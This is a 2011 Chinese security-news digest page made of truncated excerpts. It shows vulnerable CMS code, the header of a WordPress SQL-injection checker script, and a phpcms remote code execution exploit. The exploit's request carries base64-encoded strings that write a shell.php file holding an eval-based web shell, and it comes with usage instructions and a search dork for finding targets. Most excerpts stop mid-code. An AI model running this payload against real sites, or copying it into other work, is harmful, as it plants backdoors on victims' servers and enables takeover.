Php安全新闻早8点(2011-11-11 星期五)

    转载自:http://hi.baidu.com/micropoor <% if Request.Cookies("xxx")("user")="" or Request.Cookies("xxx")("admin_pass")="" or Request.Cookies("xxx")("admin_class")="" then Response.Cookies("xxx")("user")="" Response.Cookies("xxx")("pass")="" Response.Cookies("xxx")("admin_class")="" response.redirect "ad_login.asp" response.end end if %> '//代码片段--判断身份 <%if rs("admin_class")=0 then response.write" selected"%>>admin <%if

【Php】ABCMS新闻发布系统 漏洞 - 脚本漏洞

    from:90sec.org Micropoor // APP/Controller/Admincp.php     function actionliulan()         {             //管理员资料             $nowindex = $_GET['page'] ? $_GET['page'] :1;             //获取数据查询时从第几条开始取数据             $page = $_GET['page'] ? ($_GET['page']-1)*6 : 0;             //查询数据             $liulan = $this->admin->findAll('','id desc',array(6,$page));             //var_dump($liulan);exit;             //查询

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

    from:90sec.org Micropoor //template_edit.php function load_library($curr_template, $lib_name) {     $lib_name = str_replace("0xa", '', $lib_name); // 过滤 0xa 非法字符     if($lib_name == 'style')     {         $lib_file    = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.css';     }     else     {         $lib_file    = '../templates/user_themes/' . $curr_template . '/'.$lib_name.'.html';     }     $arr['html'] = str_replace("\xEF\xBB\xBF", '', file_get_contents($lib_file));     return $arr; }     严格说不应该算

WordPress 注入检查脚本 - 脚本漏洞

#!/usr/bin/python #WordPress SQL Injection Checker v1 #for md5's in the source will use #http responses. #       __  __         ___      ___ #___   __ \/ /______   __ \_____  / #__ | / /_  /_  ___/  / / /  __  / #__ |/ /_  / / /__ / /_/ // /_/ /  #_____/ /_/  \___/ \____/ \__,_/   #   http://www.vyc0d.uni.cc #  vyc0d[at]hackermail[dot]com import sys, urllib2, re, time, httplib #Bad HTTP Responses BAD_RESP = [400,401,404]

phpcms /yp/product.php 代码执行漏洞 EXP

    By:Open #!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ PHPCMS Remote Code Inject GetShell Exploit Google Dork:Powered by Phpcms 2008 code by secr +---------------------------------------------------------------------------+ '); if ($argc < 3) {     print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path host:      target server (ip/hostname) path:      path to phpcms Example: php '.$argv[0].' localhost /phpcms/ +---------------------------------------------------------------------------+ ');     exit; } error_reporting(0);  set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $exp ='/yp/product.php?view_type=1&catid=&pagesize={${fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}&areaname=0&order='; /

深入理解C语言

Dennis Ritchie  过世了,他发明了C语言,一个影响深远并彻底改变世界的计算机语言。一门经历40多年的到今天还长盛不衰的语言,今天很多语言都受到